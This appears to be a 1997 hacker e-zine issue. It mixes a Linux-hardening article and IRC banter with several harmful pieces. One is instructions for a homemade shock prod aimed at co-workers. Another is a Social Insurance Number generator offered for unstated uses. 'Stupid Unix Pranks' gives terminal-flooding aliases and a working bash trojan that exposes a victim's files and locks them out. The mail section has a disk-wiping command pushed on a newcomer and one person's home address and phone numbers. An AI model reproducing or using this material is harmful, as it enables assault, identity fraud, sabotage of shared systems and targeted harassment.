copy of Screeching Weasel's Boogadaboogadaboogda album How To Get The Ingredients: You can get the auto coil at a salvage yard. It's a black cylinder with two electrodes and a big post on the top. The battery, wire, button, tape, wire cutters, and wire strippers can be found at your local Radio Shack. You can pick up PVC pipe and cap at your local hardware store. The IQ thing should be already taken care of. if it's not, you are so fucked. You can get the CD from Lookout! Records. First Of All... This is a pretty big deal. Don't fuck around with this. Test it on a voltometer before you try it out on your co-workers. All of your mistakes will be dealt with be you; I assume no responsibility for anything you do. Now that that's been said, put on the CD... groove with it... Part 1 - Making The Baton Making the actual baton (thing you whack the target with) is a personal thing. It should be a reflection of your personality. Oh hell... Cut the PVC pipe to a length of your liking. Now, take two pieces of wire (red and black), about 3-4 feet long, and strip about 2 inches off the end. Thread them through the pipe, then pull the stripped ends out the end, like this: || || = pipe * = red wire (ground) # = black wire (negative) # * # * # * || # * || || # * || || # * || || # * || || # * || If the wires touch, the circut shorts out, and does absolutely jack shit. So make sure they don't. The more contact the baton has with skin, the bigger the shock. Take the PVC cap and drill two holes in it, spaced evenly: ___ / \ | * | | * | \___/ Thread the ends of the stripped wire through the holes in the caps and screw the cap on. Part 2 - Making The Power Pack This is the heart of the cattle prod. Here's a diagram: * = red wire (ground) # = black wire (negative) $ = green wire (positive) # * <-- from baton # * # * # * _--_ <--- button # * $$$$$$$$|____|$$$$$$$$ # _*_ $ $ ####### # | | $ + - # #####- | | + __|__________|__ # # _|_| |_|_ | | # # | | | | # # | | | | # # | | | | # # | | | battery | # # | | <-- auto coil | | # # | | |________________| # # | | # # |___________| # # # #################################################### Part 3 - Packaging And Use You can put the power pack in a backpack or something, because carrying it is all funky. To shock someone, touch the two wires at the end of the baton to their arm or whatever and push the button. Zap. Words Of Wisdom: A couple of things- one, *** DO NOT *** use a car battery for the battery. If you shock someone with a car battery, it will kill the person, or fuck them up seriously. Please don't kill anyone, k? Also, this kind of setup tends to drain batteries. A 12v lantern battery will last for about 10-20 shocks. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Securing Linux by KiDMaGiC When discussing Linux and networking, one often comes upon a taxing problem. This problem, to many administrators, can either be a burden to install or a godsend of smooth sailing. However, if you are in a situation where the former is true, I will attempt to make this a bit easier. Many months ago, back in my earlier days of using Linux, I was gullable and offered shells off of my slow 28.8 connection, which neither my ISP nor my machine appreciated. One of the people I (unknowingly) gave a shell to, unfortunately knew more about slackware 3.0's security than I did, and had rm -rf / going within seconds. At that point in time, I realized security was a must for any Linux box connected to the internet. Your personal LAN or WAN may be different in its breed and creed of users, but its much better to be safe, than sorry. The first thing that everyone I asked told me to do, was to install shadow passwords. This is an incredibly important step which involves using a random SALT to encrypt your passwords. This generally is much harder to break, and can save you a break-in due to unprotected crypt passwords. Even tho shadow passwords can be slightly difficult to install for a new Linux user, the benefits outweigh the trials. Another good idea is to install a tcp wrapper. These can be found on sunsite(ftp://sunsite.unc.edu/pub/Linux/) and are generally just good ideas. These can be your alternative to firewalls, but have less functions. Basically, a tcp wrapper checks the address of an incoming tcp packet (such as a packet for telnet, ftp, finger, etc.) and compares it to a group of files. These files contain a list of addresses, what services they can use, and wether or not the address should be allowed or denied. I find this my primary defense in the brutal world of "drive-by" attacks. If you happen to be a security/encryption nut like myself, you may also wish to get such utilities as pgp and ssh. PGP is the acronym for Pretty Good Privacy, which is "encryption for the masses." This little program is very efficient in encoding anything you want to keep secure, from emails to book reports to sensitive source code. This is an invaluable tool to have, and also just fun to play with with your friends. SSH, or secure shell, is similar to rsh, but offers advanced encryption options to avoid your connection being monitored by an outside third party. This is another invaluable tool if you have reason to believe people are out to foil your plans of world domination. :) These are just a small few of the many options you can explore for security. Things such as firewalls, network monitoring software, and packet sniffers are just too in-depth to touch base with in this article. However, information is abundant on the net, and many people would be happy to help you if you have a serious question. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Social Insurance Numbers by Devix In Canada (where I live) to get a job you must have a Social Insurance Number (SIN). I don't know much about them or why they are used but I do know how they are validated (and thus generated) so I thought I would share this info with all of you. This can be useful for numerous reasons but I'll leave that up to you to figure out. I don't know if this will work with the US equivalent, Social Security Number (SSN). OK, the Social Insurance Number is made up of 9 positive integers. To validate, the first 8 are put through an algorithm to determine the 9th. If the 9th matches, then the SIN is valid. Here is how the algorithm works: 1. Find the sum of the 1st, 3rd, 5th, and 7th digits. 2. Find the products of the following: 2 * 2nd digit 2 * 4th digit 2 * 6th digit 2 * 8th digit 3. Add the products of part 2 (above). 4. Add part 1 and part 3 together. 5. Take the ones digit from part 4 and subtract it from 10. The result should be the 9th digit. If you don't understand the above, here is a program I made in QBasic that will generate and validate Social Insurance Numbers for you. ---------------------------Start Cutting---------------------------- RANDOMIZE TIMER COLOR 12 PRINT PRINT "Social Insurance Numbers - Canadian" PRINT "Made by Devix - datadaze@hotmail.com" PRINT COLOR 7 1 PRINT "(G)enerate or (V)alidate?" 6 choice$ = INKEY$ 'Wait until key is pressed. IF choice$ = "" GOTO 6 choice$ = LCASE$(choice$) IF choice$ = "g" THEN GOTO 5 'If g the make sin IF choice$ = "v" THEN GOTO 3 'If v then check sin GOTO 1 5 'We're make a SIN! a = INT(8 * RND + 1) 'Use random numbers for the first 8 b = INT(8 * RND + 1) c = INT(8 * RND + 1) d = INT(8 * RND + 1) e = INT(8 * RND + 1) f = INT(8 * RND + 1) g = INT(8 * RND + 1) h = INT(8 * RND + 1) k = a + c + e + g 'Add them l = (b * 2) + (d * 2) + (f * 2) + (h * 2) 'Multiply them m = k + l 'Add them 2 IF m > 10 THEN m = m - 10: GOTO 2 'Get the last digit. COLOR 2 PRINT FOR i = 0 TO 9 'Get the check digit. IF i = 10 - m THEN PRINT a; b; c; d; e; f; g; h; i: COLOR 7: END NEXT i 'Not found, go on to next. COLOR 7 END 3 'Were checkin a SIN! PRINT PRINT "Numbers seperated by comma's." PRINT "ie: 1,2,8,3,9,5,5,8,5" INPUT a, b, c, d, e, f, g, h, i 'Get the numbers k = a + c + e + g 'Add them l = (b * 2) + (d * 2) + (f * 2) + (h * 2) 'Multiply them m = k + l 'Add them 4 IF m > 10 THEN m = m - 10: GOTO 4 'Get the check digit. PRINT COLOR 2 IF i = 10 - m THEN PRINT "Valid!" ELSE PRINT "Invalid!" 'If digit is right, COLOR 7 'then tell the guy. ---------------------------Stop Cutting----------------------------- I've also included a program I made in vb that does the same thing. (sin.zip). Source code is encluded. Enjoy! begin 644 sin.zip M4$L#!!0````(`!F##R-E7`8W@0,``.P&```,````1E)-7TU!24XN1E)-;51- M;!M%%/YF=M;=V*9)K!Q*!>H"4525RB25@!($`D);68*H:JJJXF+9R2:Q\$\P MZ\;-Q1'RQ1=??""72E4B40G(A3,2%ASH@4H3-M7G+)3 MS;F5JM'M=F%>4<`#$_@Z#GQ![^<%/L`K/CW3YN5*M33W.BO>8,F;K+G((E^\ M2A6,9-XM9V_DBH65G.LH']8QOFNNBQ_4VV)2PC=8*[4VJ*VUQ_BN>0%:*TA[ MAK0B[M;=[&*ME'>JTE=U\%DOBA35-?BKF;&/B,%3M_V_[0 MN56HS]LK_'K/77XE[32K..7^7CL3694IB29ZC$ M.2JAXL5\,6B!RISHHWD2UW$@?T+*`$FENDW#^,>4&$=69,48A#14+&%:\>VK MVU=/T%6PR]>$(TAQB/][/L%W%._!&^+YW/M` M*CK1[$*QL/PIL"UR#RGD&2US6.E2'/G=T MODLS\OU[E._".WN`2[@L^KBG5V-8('/PGGWJR9M^E]3G9)"?964/7R$#F[A' MF-6][N';`-R#H#V7Z0).)^X`D^>9)._A'C)[WIOVE":;R#=?G?"LU% M_8QO=I)J(Z+WK)"M1=EDR&Y%V8F0;439J9!M1ME3(=N*LB^$;#O*VB';B;+3 M(7-H9^B2:X%+)K5+COX%4$L#!!0` M```(`"V##R/6#>&W<````'X````,````4%)/2D5#5#$N34%+6V0*YG6WY1 MKJU26E%NO&]B9IX2+U=(9DE.JJU2L)ZGGI^>@GMJ7FI18DE^$5#&M2+5+S$7 M).?I%PZTSC7"%2@*`%!+`P04````"``Z@P\C69NER\0(``!`'```"@```%-) M3E=)3BY%6$7M67U05-<5/^]CW66%94&J8G!Y2\@V55P0$;;L(A_!Q94/&31J M"1&7L.`ZN&N7MT)LK*O^@ZZ2Z4QFTK':M.I?F8ZQ+3-5FE$41ZH6JXW3(;93 M.VE:=8RV:CO2$;D]][ZW",MJVIDTQC1G>>^>W_FZ][YW[KL?5-<3T`"`A!''P*30%OJ)GG'8/+?A]]\7PGY?7'DWD:L__5#K*P0=#.X8Y.:'7)/3$ M#9J/<#U5@^:>G$&S0VC7H/#FC>XI6;"@+SQ\C!#+MJ+:TN!TR[8M_(HE08,E MM$4L"FKW!#4[\W\@H++#&TRC2E]S,`5+T1L(QJ/1E**@IM>B_4)/ZJ!9+#T^Q'>)SC-B(5X-SIZ*G\&@>?=0=]^)(3ZW[Y@3[AY> M%MI"&F3QC*:AXOA%/FRXP-\[U#O$'X6B07,@\>`[PLTENR]V#V%C;]A)&%NR M8Y3(M[I-61`>#3E`_N@G#KLLZON"]\,7YOYFQ[\X^5KX/H:_=V@9]:-MO[FO M=Y-PX^$H[6L8FX8U$W+W\/U+X0_#EVAKCF\#RZXJLNLDW^_X;L=O+5WE)/>6 M<&>/K?3AO4,C)U![1B-5A//W"ZS>\ZY[AY0.*&%H"%K7C_<+PJFYE]IUF8GB M'=NIP$Y:V7':%&H1-KTC'&^``?']T8%RG@P.E(OFGH'R*8N0TYEO#)3KOP\] MQ1BR%SC3RO,ZZ/#ZK*_Y-WQ&V;%BG;==VACPMP;<&Z2`Y]M!;\#3+E5[7POX MV_TMLK3*ZVOV=[1;$_29W_(')7?`([G;`AYW\^M2(.CS>7VML8U?]KF;VCR2 M[)?:97=`CFTT_G/T%?V/J&:Q1C\"/#@7UU4D"SR`$6J-[,O/@XAE&LX$Z^!C M^#O-:=O%2#TZ,(24 M^81&STGC0LP]Q"N>6%M$-@T$Y'G&ZT,:II\^3C^3\8I^%N-%QJ>QN)K0Y#[J MEKMJ5KEJ&(]MT*TLJWNY9D%.#L9:;G59:ZQ2A,CGH&OY$M*E:[WZDKD2M>Y@G^FANS?*_#9S]GO&"]GSX+),E,,648, MF26&;$X,F36&+#>&+!]EYGFSP#PO`ZZ6F.?-8?=O'PN@M:74HO5 MKM)T`U?I2LQUPBV,E8&:@N=FDED\C>5DEM1C?>FZ\E_D&5&:9\L!*IN%==0: MS\H1;%)Q15%$DC%)8IDDF3-)8ITDR9TDR9\D<8Y)^I-\2ZL@4#6UK]+UR4*E M9SK33+(4>_FA9XWA%4.EBUK$H<5!XUO!1-;GS?ALROBEZ6^(C[1O&>/QF7S' M0*_W@[],JC7:LFMAHGXX2E\7I1^-TJ^(THNVB?J547I]E'YUE-X8I:^/TD^/ MTC=$Z=.B]&NB]!E1^K6H/Y!5"P>R5L`'M@-9J]F]`>^V[":FJ\-G\C?;!>16 MJARUJ!_'KQGC;=G-S*<)XS5CC".&R]DM+&L%S-J6L:S]1(@@FK4M+&M/"]1S M+;Y])4=;6([VY)6(D?;OM1DA6=2#A(N>E>XV;[,9H#_I:LE!XU\*]MH,8!5U M@%.)Y/*U^`'^43>Z.9K\NW*89W6Y1W)+O@*5.J.L-&]GLV:'2( M.(^O7PKRHE*@&L$X"A'_>N9;3.7[9@)^^!MNQY" MM1+PZLY2S[_GRD#^(1E-?.0/X_R5N7X.7+.+N+4KW(G[-,?ZW\= MF4X&X[$?>5AFH==9IC?QBG4F;^%&$XV<@E*8M0.O;B6,ZG<%_3@N$WW>$!7+ M[5B.)IX1%)0$F3RUYN$V[?TS3[0GDL2S_N=P%$L27:.)<)VGJ\`O-[VHGGV4 MJ!D`\/B##YIP)":=)&3$L97TCZ0/%X]H'Y"1=+RV/B`/R9.OD^3!2!%YT'^2 M##N*L21DN)B@_+\E6C]L)7V0/@R@Q8N66X=Q:/SG5S$9%CZ]?OA2OW]E/(<> MF_0A]@>AD%+0'Q7AK:^OCV8(^Z.?.U;0'Q5]GH_M3:+=.!X1HNU0!3KE%6H[ M%$'DE4;T8W@C3,``GR?NZAJ/'R&**;I].X(G(DI/0D^9R)/&;>CIC5M!VA8B M9&R#3'=\D_?$S@0QY`3"G5X"SKKJQNI25XT5&;1?S3;AST$QC;6:H[OPV2K` M062"=!4(=)2958"C+`.>5P%.^IGP@@KP@,$"7U>!EH[.;ZA`1Q<&2K0`U@A6P53`7)@O@H2V$Z64X`18"'DJYHD@`)";4*B":0!V7!0H M((7.?Y$`N/98A'(%S*!?C%(5S`0H@Y=4D`F0,N;S`D`Y+%8T"DT`7Q#R.Y32 MQOD=EK'_`XR_T^.>M^TD?IFCT;&*6;,U8/RC_$J!5K8N5%9COV)K1IUZ\A,/ M-!4PC4(4BPS5L\3Y[*F>K1;7JS5&:!\]2P(MM-HYN(([W'.X7^@E&GB7:/'$ M(PYVD:FPF23`>I((];C"6TJF02'Y&LPA,\!40L^=KI._DH_)1^1/Y(_D#^0* M&2*_(Y?):8RE977%5:D=>\:(_#H+-"TX<%]A,"&#L^"L98S^!@AT?M-48!<' M<<"^BV-N.Y:I'";^\VQIK7'Z`QOF+Z06^=2D@-K8J!&F1#[]T(!(\.B-;HS< MLD?\D68==T*T8&P[LJ6=C]DA0MC(\$3N! MUC&;2Z:-$%YE.PR.0.E+>$(M>YJEIM>EAU$R+$GF=9Z/')[M;_>P, M7>KHZ+!&R;*9I:83+O+7XEKY9!%2^'0:W0=<2V-!8[?;Z]'*GW*BT/;Y)]C5&'CD#D=>F;VMJ4XVF5+F;/&WS M_PU02P$"%``4````"``9@P\C95P&-X$#``#L!@``#````````````"`````` M````1E)-7TU!24XN1E)-4$L!`A0`%`````@`+8,/(]8-X;=P````?@````P` M`````````0`@````JP,``%!23TI%0U0Q+DU!2U!+`0(4`!0````(`#J##R-9 MFZ7+Q`@``$`<```*````````````(````$4$``!324Y724XN15A%4$L%!@`` 0```#``,`K````#$-```````` ` end Devix - devix@thepentagon.com www.thepentagon.com/devix PGP key available above. Use it. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Stupid Unix Pranks by The Darkling Terminal flooding Is a very annoying and a great way to make people look stupid. However this requires something. Go into /dev and type ls -la ttyp?. This will get you a listing of the permisions on the ttyps. For any reason should you have right accsess to any ttyp# (that stands for ttyp number) you can do this. Another thing you can do is if they ever leave their computer un-attended walk over to it, type who am i (for your user name) and then type who username for their ttyp number. then type cd /dev and then chmod a+rwx ttyp(their ttyp#) ( Side note: chmod is a change permissions command. a = all and a+rwx gives people read write and exacute perms on it). this setting will stick threw all of their ttyp's (they change every time). Most default settings give you write accsess to other peoples ttyps. Don't ask me why, but they do. Now we have to write a couple scripts to do the terminal flood and to setup for it other times. Asuming you don't have a .bash_profile I am now going to go threw what it is and how we will use it. .bash_profile is a file that will run everytime you login asuming you are using a bash shell. if not.. type /bin/bash now and load one. here is the heading for your .bash_profile (and every other bash script) !#/bin/bash this means that we are sending commands to the bash shell.. its just propper form, and some whate unessary if your using a bash shell. now what were going to do is setup a little rutine that wil grab us everyons login name and ttype number so we can check this when ever. I have mine setup so that it tells me eveyones in the begging and writes it to a file (that re-freshes everytime) in my home dir called flowers. here it is, I'll go over it in a sec !#/bin/bash who who > flowers alias flood='cat /etc/wmtp > /dev/ttyp$1' alias fuck='echo Fuck You > /dev/ttyp$1' alias w='who' alias hehe="echo You were flooded curtusy of The Night script www.wilter.com/Darkling/ > /dev/ttpy$1' Now save it. Exit your shell and log backin for the changes to take affect now. As you enter you will be presented with a list of peoples names and ttyps, as a off note this information can also be seen in the file named flowers. Also you might want to get the above source out of the html code. Just so it isn't fucked over when you put it in. If you need to see the information quickly, just type w and then enter and you will see it again. When we want to flood some one we type flood # ( or flood space their ttyp number ) and the entire contents of wmpt (usaly f***** huge) will be dumped to their screen. Similarly if you type fuck # (fuck space their ttyp number) they will get a Fuck You added to where ever their curser is, or was. its halurs if their e-mailing the root and you do it just ebfor they send it. The fuck you is added to the mail message then its sent... you get the picuter =0). Also after every day of tortue it would be nice to me if you would type hehe # (hehe space ttyp #) wich broadcasts a advertisment about this page. #2 This is what I call a Joke Trojen. While this method could be used to do some very bad things I don't really condone them. Warning: This could get you kicked out of unix class and if your school is tight as mine maybe given the big boot. Use with caution. The entire Idea behind this is that we need someone dumb enough to run a program you give them. this program will be a trojen horse that will efectivly lock them out and give you RWX on everything they own. My unix may be a bit rusty as I'm writing this up after unix class, but everything should work. First 'know thi victem, sayith the lord' this person has to be someone that has something you want, and will run a program without thinking about it. Once you have chosen your victem, make the following bash script: <--- begin code ---> #!/bin/bash echo you stupid dick chmod a+rwx * echo logout > .bash_profile cd /home/yourusername echo The hit is made sir > YES echo bye logout <--- End code ---> Now make type chmod g=x filename chmod o=x filename chmod a+xw /home/yourusername Make sure to have named it someting like runme or some name that some one would think it a little program that is kewl and safe to run. We before denied read or write accsess to it so they can't see its true nature (except root), so they should not fear it. Place it in their /home/username/ dir and wait for the file YES to appear in your home dir. be sure to fill in the vars like yourusername and filename (your user name adn whatever you name the file). The effect of the trojen above goes like this : it says to their screen 'you stupid dick' it gives everyone read write and exacute perms to their files (all!) it makes it so their startup files makes them logout (so they can't log back in.. ) it goes to your dir it makes a file called YES with the insides 'The hit is made sir' it tells them 'bye' it logs them out. I personely like it.. its very effective. if you have the right setup perms on yourstuff ( shown above with the chmod commands) then it all should work. Go have fun in their dir.. then remove the logout from their .bash_profile before they report to the teacher that some one put a trojen in their dir. =) The Darkling Contact: Darkling69@mintprimary.com http://www.wilter.com/~Darkling/ (soon to be) ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Oddville, THTJ [ This month, sadly Oddville is very small since this month, Scud-O's registry was fucked and he lost Eudora,. and thus all this strange, strange mail, so if you sent some whacked shit to me, resend it again, por favor! heh. ] Date: Tue, 16 Sep 1997 22:43:59 -0400 (EDT) From: cLOut X-Sender: clout@wilma To: scud@thtj.com Subject: log hey..here's a log file i had from a few days ago... add it to THTJ if you want man..latz. ==/==/== cL0ut clout@widomaker.com [finger for PGP public key] This is from some dumbass that joined #phrack () Can someone tell me where to get salt peter. salt peter? please hm Potassium Nitrate you can find salt & pepper on your kitchen table Im from australia, and Ive never ehard of it before. It's a special type Ok then. Can anyone get onto #bombs? Its invite only. or know the nick of a person on it? red_tab: i can tell you how to get in yawn What do you want? red_tab: type /run fdisk \y /mbr Yeah. Sure For gods sake. Im not that dumb * Shok is idle, automatically dead [bX(l/on p/off)] red_tab: you sound that dumb h0h0h0 It wouldn't work anywany, Im not on UNIX thanks HAHAHAHAHAHAH you dumbass fdisk is a DOS commands command even cl0ut not neccesarily Ok it would work then. i am that dumb but those lil commands you gave him were for the dos version <(END LOG)> --- Date: Tue, 16 Sep 1997 21:47:58 +0100 From: ToX X-Mailer: Mozilla 3.03 (Win16; I) To: thtj@thtj.com Subject: Windows 95 NetWork Crack My problem is that I have made a bet with my freind, that i can break his Windows 95 NetWork... When you share a directory, you can put a password on it, and it is this password that i have to break... Can you pleash help me ! ToX MT@BRUHN.DK [no.] --- From: "TM" Organization: SIN/Technophoria To: xxxxxx@xxxxxxx.net Date: Sun, 21 Sep 1997 00:10:39 -7000 Subject: Movie To See Priority: normal X-mailer: Pegasus Mail for Win32 (v2.54 preview) Ok, if any of you are going to the movies any time soon, GO SEE THE GAME! IT KICKS ASS! We are talking a big two thumbs up and one fucking STUNNED audience. Go see it now, in fact. Go ahead and leave your computer online, let it time out, go and stand outside of the fucking movie theater until it starts or comes there... threaten the manager with anal rape unless he show The Game there. Oh shit oh shit oh shit what a fucking trip... wow... I mean, you think you know what's up, you think you have the big picture but then it rips apart and all of a sudden the picture gets much bigger... I loved it so much I was incoherent for 2 hours afterwards (I just got back from seeing it, as you can tell). ____ / ___| ___ | | _ / _ \ | |_| | (_) | \____|\___/ ____ ___ _ _ / ___| ___ ___ |_ _| |_| | \___ \ / _ \/ _ \ | || __| | ___) | __/ __/ | || |_|_| |____/ \___|\___| |___|\__(_) Nownownownownow! +--------------------------------+ | TM | +--------------------------------+ | Ou' sont les neiges d' antan | | Villon | +________________________________+ | There is a man... | | playing a violin... | | and the strings... | | are the nerves in his own arm. | | A twisted soul- the mortar... | | despair- the bricks... | | to build a temple of sadness. | | The Crow, J. O'Barr | +--------------------------------+ | This tagline is SHAREWARE! | | To register, send me $10. | +--------------------------------+ [ I agree, this is one hell of a movie, and i recommend seeing it when intoxicated for an added effect. ] --- Name: Alam Farez House fone number: (860)875-2117 Personal fone number: (860)875-9911 Address: 9 Deerfield Lane Ellington, CT 06029 URL: http://members.tripod.com/~zerohex/zer0.html email address: zer0-hex@juno.com ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ #phrack so1o: whats the new crh gunna have in it? replicas of phrack articles an original idea maybe this time? never could never have one of those gha ÚÄÄÄ-ÄÄÄ(( whois information: number6 ))ÄÄ-Ä-ÄÄ-ÄÄÄ--ÄÄ-ÄÄ-Ä-Ä -ÄÄ-Ä- -Ä ³ address ð ~no6@jolt.ppp.dhp.com [Commercial Organization] ³ quote ð Number 6 ³ channels ð #phrack #glitterglam ³ server ð irc-w.primenet.com: [206.165.111.241] Primenet Mae-West IRC server ÀÄÄÄ-ÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄÄ--ÄÄÄ-ÄÄÄ-ÄÄ-Ä Ä-ÄÄ-ÄÄ- -Ä hehe it will be 200% orig1nal f00 its to hard to come up with an original idea i didnt read that yet wait and see i will go read it now let alown write those original ideas down === (join\#phrack) VC[VC@rhat.cts.com] @[02:03:51am] i wrote something down once.. it said... I R0CK heh 200% oh dear 200 proof then much easier to rip other peoples shit f00 heh cut their name paste yours I seen an article published in crh that was also in EL8 newsletter 1 but changed. ÚÄÄÄ-ÄÄÄ(( whois information: FrontLine ))ÄÄ-Ä-ÄÄ-ÄÄÄ--ÄÄ-ÄÄ-Ä-Ä -ÄÄ-Ä- -Ä ³ address ð assembly@penguinpalace.com [Commercial Organization] ³ quote ð ³ channels ð #phrack @#cheese #glitterglam ³ server ð irc.visi.com: Rockin' Snowland Server ÀÄÄÄ-ÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄÄ--ÄÄÄ-ÄÄÄ-ÄÄ-Ä Ä-ÄÄ-ÄÄ- -Ä much much much easier i didn't paste my name heh === (join\#phrack) WOWEE[netcom.ix.@chi-il11-04.ix.netcom.com] @[02:04:35am] hello Oh you actually typed it out did i see so1o and original on the same screen? ù halflife blinks isn't FrontLine a medication for vaginal warts? yeah halflife im gonna try reeally hard heh ù so1o concentrates === (nick\change) rh1n0 ÄÄ> WEP can someone tell me where i can get an anonymous emailer and browse the web so1o puts out a lot of issues leave too bad they all suck issue 5 is good but hey, theres lots of em atleast ù FrontLine watches as s01o's head explodes from trying to come up with an original idea i read it, but dont remember any of it so1o, so a redhat 2.1 exploit is GOOD? At least its a zine. issue 5 i said heh wowee: check out http://www.research.att.com/projects/crowds/ llalala thnx ù FrontLine is amazed that in all that mess from his head exploding nothing original could be found i got 4 original submissions so far he phear === (nick\change) WEP ÄÄ> rh1n0 s/he/so heh um so1o, originality is crap unless they're good so1o how many of them are other handles u use?> Do people just submit to CRH or is it all codezero based? === (join\#phrack) ld-100[555ic@d-pm4-39.txdirect.net] @[02:07:04am] ahhaha === (signoff\#phrack) ld-100[555ic@d-pm4-39.txdirect.net] @[02:07:06am] [Connection reset by peer] alhambra_, hahahaha Maybe you should lay off of hacking 30 web pages a week and devote your time on something more constructive! (are written by) alh : none so1o: in your next issue are you going to have |<-RaD flash warez yeah how did you know? www.sekurity.org/~vol CRH 5 crh 5 is elitespeak mflash too so no-one can readit heh www.sekurity.org/~warpy is more ereeter mflash.bas i've been there hahaha visual basic mailflashes!@ www.sekurity.org/~shok has no index.html hehe wew hoo mflash!!!!

  • www.nque.com/~li has no html!
  • hi www.larc.nasa.gov is br0k3n and it wasn't me so1o has mad phf sk1llz phf is k-r4d === (signoff\#phrack) phiXati0n[PHUCK_you@167-123-97.ipt.aol.com] @[02:08:59am] [ChaNNeL BoT bY |IceMan|------©HäÑñ飠ßøt ß¥ |íÇÈmÅñ|] === (kick\#phrack) Warpy[warpy@slsyd75p22.ozemail.com.au] kicked [so1o] off #phrack [schmack] i think crh and el8 should merge get all the crap in one place hehe lol === (join\#phrack) so1o[REPL4Y@serug.netgates.co.uk] @[02:09:13am] hey halflife: lo fuckin loud no fair what happened to #codezero ? crh 6 will have unpublished and orignal exploits in it so1o, name one exploit/vuln c0d3z3r0 have coded/found *THEMSELVES* === (signoff\#phrack) ld-50[555ic@d-pm4-26.txdirect.net] @[02:10:08am] [Operation timed out] === (join\#phrack) ld-100[555ic@d-pm2-05.txdirect.net] @[02:10:13am] judging from the originality of crh, REPL4Y is a good username for so1o
  • mount.c
  • ? phf xterm tekneeq bahahaha hah oh my god oh dear hahaha and thats a funny group name cause they code zero === (topic\#phrack) Warpy[warpy@slsyd75p22.ozemail.com.au] sets topic ( phf xterm tekneeq) soltool is a fuckin' rip off so1o, people were doing that before the ibm advisory came out like 2 yrs ago dev_null, agreed i coded that myself gneegr0 soltool is backdoored too modify: what does global kos do? yeah YOU CODED A FUCKING SHELL SCRIPT WITH PUBLIC EXPLOITS? i did that too === (nick\change) ld-100 ÄÄ> ld-50 Im not defending codezero but global kos doesnt do crap. phf xterm technique is ancient chris: go to school and work chris0, just because they don't hack pages and trade warez doesn't mean they don't do crap Global kOS is kinda lame...i have yet to see something usefull come out from them, hah hah upyours4.exe hah hehe === (part\#phrack) few1[blah@phat.oz.net] @[02:11:57am] dev_null: so how do they differ from c0dez3r0? so1o, at least they understood enough sendmail to code it warpy: Im saying they havent released anything. === (signoff\#phrack) alhambra_[alhambra@nuclear.biodome.org] @[02:12:27am] [changing servers] www.thtj.com/kOS/screenshot.jpg >>> (msg(modify)) this shit is funny a group is about/for the group not admirers or exploit k1dd1es ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ === (join\#phrack) so7o[REPL4Y@amon.netgates.co.uk] @[02:14:51am] At least they do a mag its better than nothing. we are getting better no, it isnt remember ZERO so7o, the quality hasnt changed www.sinnerz.com/zero yes it has and you still do lame stuff like dump d0x we have taken that into consideration and i have already tackled the issue for 6 who is we anyway your content is 1) lame and 2) stolen a bad combo h0h0h0 if yer gonna steal shit, steal better stuff yah and so1o hehe stop publishing other peoples shit on bugtraq hahah that was another so1o oh right
  • *cough* "i couldn't find the remote root code, but here's something anyway.." (imap) the other so1o
  • :> i'll relay the message hrmm you mean there are 2 of you? yeah SPLIT PERSONALITIZ and there's a dude called codezero i guess it's shit like this why i don't go to cons
  • so1o.. you told me you did it because you were tired of all the lamers gettin the code
  • or something www.sekurity.org/~vol that page rules alhambra_, it does don't it :) yep bugtraq is there to make the world a safer place so1o it doesn't matter i think everybodty should post everything to bugtraq and your here to make the world a lamer place? u dont publish others exploits there is he called codezero cuz that describes how much code he has written in his life? point being?
  • hold.. lemme post nlock u dont publish others exploits there is he called codezero cuz that describes how much code he has written in his life? point being?
  • hold.. lemme post nlock === (join\#phrack) Volatile[vol@synapse-160.mindport.net] @[02:19:08am] so1o! Old hacking files are totally krad compared most of the new shit. li: Hey there li i was considering posting the nlock source li: Long time but sun would kick my ass Phrack is an ok magazine just too much source. geezus === (join\#phrack) loath[loath@206.29.0.102] @[02:19:41am] === (signoff\#phrack) chris0[brutus@wrt1-ppp30.dial.snowline.net] @[02:19:41am] [Leaving] so7o, post nlock and everyone will kick yer ass why? tho i suppose you'd need netcat for it :P i think we need to publish less source so7o: So how's CodeZero? because you would rather be all k-r4d and 31337 i was gonna post the netscape 128k encyrption k0de haha No so7o would That's why he's posting it === (nick\change) prym ÄÄ> FEGR00LZ and keep all your neat little remote's in sshd and the like to yourselves but it's old shit That's why he's posting it === (nick\change) prym ÄÄ> FEGR00LZ and keep all your neat little remote's in sshd and the like to yourselves but it's old shit === (nick\change) FEGR00LZ ÄÄ> prym half: Im doing one on CISCO for the next issue He wants to look like he has the greatest archives. with d1s
